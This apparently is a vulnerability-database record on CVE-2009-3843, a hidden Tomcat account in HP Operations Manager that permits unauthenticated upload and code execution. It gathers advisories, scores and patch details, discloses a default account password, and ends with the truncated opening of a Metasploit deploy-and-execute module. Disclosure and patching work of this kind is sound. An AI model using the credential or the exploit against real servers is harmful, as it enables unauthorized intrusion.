DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2009-3843", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2009-3843", "description": "HP Operations Manager 8.10 on Windows contains a \"hidden account\" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.", "published": "2009-11-24T00:30:00", "modified": "2017-08-17T01:31:00", "epss": [{"cve": "CVE-2009-3843", "epss": 0.90606, "percentile": 0.98528, "modified": "2023-12-03"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3843", "reporter": "hp-security-alert@hp.com", "references": ["http://marc.info/?l=bugtraq&m=125873415424980&w=2", "http://www.osvdb.org/60317", "http://secunia.com/advisories/37444", "http://www.zerodayinitiative.com/advisories/ZDI-09-085/", "http://securitytracker.com/id?1023222", "https://exchange.xforce.ibmcloud.com/vulnerabilities/54361"], "cvelist": ["CVE-2009-3843"], "immutableFields": [], "lastseen": "2023-12-03T14:19:20", "viewCount": 104, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:7AD2ABEF-642C-4C50-B84F-BB1FCBC66D8B"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2009-312"]}, {"type": "cve", "idList": ["CVE-2009-4189"]}, {"type": "kitploit", "idList": ["KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103550", "OPENVAS:1361412562310111013"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125021", "PACKETSTORM:86448"]}, {"type": "prion", "idList": ["PRION:CVE-2009-3843", "PRION:CVE-2009-4189"]}, {"type": "saint", "idList": ["SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:7CC6DA9BCE40E1A4453714BA7B40AFF7", "SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22818", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:VULN:10414"]}, {"type": "seebug", "idList": ["SSV:14974"]}, {"type": "zdi", "idList": ["ZDI-09-085"]}, {"type": "zdt", "idList": ["1337DAY-ID-21853"]}]}, "score": {"value": 9.4, "uncertanity": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:8672599587089685905"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/TOMCAT_MGR_DEPLOY", "MSF:EXPLOIT/MULTI/HTTP/TOMCAT_MGR_UPLOAD"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310111013"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125021"]}, {"type": "saint", "idList": ["SAINT:5DF2E8BB0ECF29725510E3173971EDE5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10414"]}, {"type": "seebug", "idList": ["SSV:14974"]}, {"type": "zdi", "idList": ["ZDI-09-085"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "hp operations manager", "version": 8}]}, "epss": [{"cve": "CVE-2009-3843", "epss": 0.90606, "percentile": 0.98298, "modified": "2023-05-08"}], "short_description": " HP Ops Manager 8.10 Windows XML File Remote Code Executio", "tags": ["hp", "operations manager", "windows", "xml", "remote code execution", "security vulnerability", "cve-2009-3843", "nvd"], "vulnersScore": 9.4}, "_state": {"dependencies": 1701614324, "score": 1701614337, "affected_software_major_version": 1701662121, "epss": 0, "chatgpt": 0}, "_internal": {"score_hash": "f2f9e8689aef44559b7015614c6e25cb", "chatgpt": "bcd8b0c2eb1fce714eab6cef0d771acc"}, "cna_cvss": {"cna": "hp", "cvss": {}}, "cpe": ["cpe:/a:hp:operations_manager:8.10"], "cpe23": ["cpe:2.3:a:hp:operations_manager:8.10:*:windows:*:*:*:*:*"], "cwe": ["CWE-264"], "affectedSoftware": [{"cpeName": "hp:operations_manager", "version": "8.10", "operator": "eq", "name": "hp operations manager"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:hp:operations_manager:8.10:*:windows:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "http://marc.info/?l=bugtraq&m=125873415424980&w=2", "name": "HPSBMA02478", "refsource": "HP", "tags": []}, {"url": "http://www.osvdb.org/60317", "name": "60317", "refsource": "OSVDB", "tags": []}, {"url": "http://secunia.com/advisories/37444", "name": "37444", "refsource": "SECUNIA", "tags": ["Vendor Advisory"]}, {"url": "http://www.zerodayinitiative.com/advisories/ZDI-09-085/", "name": "http://www.zerodayinitiative.com/advisories/ZDI-09-085/", "refsource": "MISC", "tags": []}, {"url": "http://securitytracker.com/id?1023222", "name": "1023222", "refsource": "SECTRACK", "tags": []}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54361", "name": "operations-manager-unspecified-sec-bypass(54361)", "refsource": "XF", "tags": []}], "product_info": [{"vendor": "Hp", "product": "Operations_manager"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"description": "n/a", "lang": "en", "type": "text"}]}], "exploits": [], "assigned": "2009-11-02T00:00:00"}

{"saint": [{"lastseen": "2016-10-03T15:01:54", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:32", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T18:51:58", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<https://vulners.com/cve/CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:88789BF22A82B3B79355F9F1C375C644", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T16:51:43", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<https://vulners.com/cve/CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:7CC6DA9BCE40E1A4453714BA7B40AFF7", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "description": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-085\r\nNovember 20, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-3843\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Operations Manager for Windows\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9261. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard Operations Manager.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists due to a hidden account present within the\r\nTomcat users XML file. Using this account a malicious user can access\r\nthe org.apache.catalina.manager.HTMLManagerServlet class. This is\r\ndefined within the catalina-manager.jar file installed with the product.\r\nThis servlet allows a remote user to upload a file via a POST request to\r\n/manager/html/upload. If an attacker uploads malicious content it can\r\nthen be accessed and executed on the server which leads to arbitrary\r\ncode execution under the context of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960\r\n\r\n-- Disclosure Timeline:\r\n2009-11-09 - Vulnerability reported to vendor\r\n2009-11-20 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Stephen Fewer of Harmony Security &#40;www.harmonysecurity.com&#41;\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n", "cvss3": {}, "published": "2009-11-23T00:00:00", "type": "securityvulns", "title": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-23T00:00:00", "id": "SECURITYVULNS:DOC:22821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22821", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01931960\r\nVersion: 1\r\n\r\nHPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-11-18\r\nLast Updated: 2009-11-18\r\n\r\nPotential Security Impact: Remote unauthorized access\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Operations Manager for Windows. The\r\nvulnerability could be exploited remotely to gain unauthorized access.\r\n\r\nReferences: CVE-2009-3843\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Operations Manager for Windows v8.10\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3843 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:N&#41; 9.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Stephen Fewer of Harmony Security working with TippingPoint&#39;s\r\nZero Day initiative for reporting this vulnerability to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made the following patch available to resolve the vulnerability. The patch is available for\r\ndownload from http://support.openview.hp.com/selfsolve/patches\r\n\r\nProduct\r\n Version\r\n Patch\r\n\r\nHP Operations Manager for Windows\r\n 8.10\r\n OMW_00032 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 18 November 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer&#39;s patch management\r\npolicy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted\r\nusing PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity.\r\nHP is continually reviewing and enhancing the security features of software products to provide\r\ncustomers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of\r\nthe affected HP products the important security information contained in this Bulletin. HP recommends\r\nthat all users determine the applicability of this information to their individual situations and\r\ntake appropriate action. HP does not warrant that this information is necessarily accurate or\r\ncomplete for all user situations and, consequently, HP will not be responsible for any damages\r\nresulting from user&#39;s use or disregard of the information provided in this Bulletin. To the extent\r\npermitted by law, HP disclaims all warranties, either express or implied, including the warranties of\r\nmerchantability and fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided &quot;as is&quot; without warranty of any kind. To the extent\r\npermitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost profits;damages relating to\r\nthe procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard\r\nCompany and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product and company names mentioned herein\r\nmay be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAksERwAACgkQ4B86/C0qfVnibACgmYvkL5wCSUtU9mVpWPSwQWAY\r\nlx8AoL0P1iOjGRgCdvWxEnlNM9tKr71j\r\n=p9gT\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2009-11-20T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22818", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:58:45", "description": "There is a hidden undocumented Tomcat account.", "cvss3": {}, "published": "2009-11-23T00:00:00", "type": "securityvulns", "title": "HP Operations Manager backdoor account", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-23T00:00:00", "id": "SECURITYVULNS:VULN:10414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10414", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-10-18T11:32:52", "description": "HP Operations Manager 8.10 on Windows contains a \u201chidden account\u201d in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2009-11-24T00:00:00", "type": "attackerkb", "title": "CVE-2009-3843", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2023-10-04T00:00:00", "id": "AKB:7AD2ABEF-642C-4C50-B84F-BB1FCBC66D8B", "href": "https://attackerkb.com/topics/JXxzdmi7fH/cve-2009-3843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T05:09:02", "description": "HP Operations Manager 8.10 on Windows contains a \"hidden account\" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.", "cvss3": {}, "published": "2009-11-24T00:30:00", "type": "prion", "title": "Unrestricted file upload", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2017-08-17T01:31:00", "id": "PRION:CVE-2009-3843", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2009-3843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T05:09:38", "description": "HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.", "cvss3": {}, "published": "2009-12-03T17:30:00", "type": "prion", "title": "Unrestricted file upload", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3099", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2009-12-04T05:00:00", "id": "PRION:CVE-2009-4189", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2009-4189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:34", "description": "", "cvss3": {}, "published": "2010-02-19T00:00:00", "type": "packetstorm", "title": "Apache Tomcat Manager Application Deployer Upload and Execute", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2010-02-19T00:00:00", "id": "PACKETSTORM:86448", "href": "https://packetstormsecurity.com/files/86448/Apache-Tomcat-Manager-Application-Deployer-Upload-and-Execute.html", "sourceData": "`## \n# $Id: tomcat_mgr_deploy.rb 8552 2010-02-18 18:18:43Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Tomcat Manager Application Deployer Upload and Execute', \n'Description' => %q{ \nThis module can be used to execute a payload on Apache Tomcat servers that \nhave an exposed \"manager\" application. The payload is uploaded as a WAR archive \ncontaining a jsp application using a PUT request. \n \nThe manager application can also be abused using /manager/html/upload, but that \nmethod is not implemented in this module. \n}, \n'Author' => [ 'jduck' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 8552 $', \n'References' => \n[ \n# There is no single vulnerability associated with deployment functionality. \n# Instead, the focus has been on insecure/blank/hardcoded default passwords. \n \n# The following references refer to HP Operations Manager \n[ 'CVE', '2009-3843' ], \n[ 'OSVDB', '60317' ], \n \n# tomcat docs \n[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] \n], \n'Platform' => [ 'win' ], \n'Targets' => \n[ \n[ 'Automatic', { } ], \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('PATH', [ true, \"The URI path of the manager app (/deploy and /undeploy will be used)\", '/manager']) \n], self.class) \nend \n \n \ndef exploit \n \n# TODO: autodetect arch/platform from /manager/serverinfo and/or db notes \narch = ARCH_X86 \nplat = [Msf::Module::Platform::Windows] \n \n# Generate the WAR containing the EXE containing the payload \njsp_name = 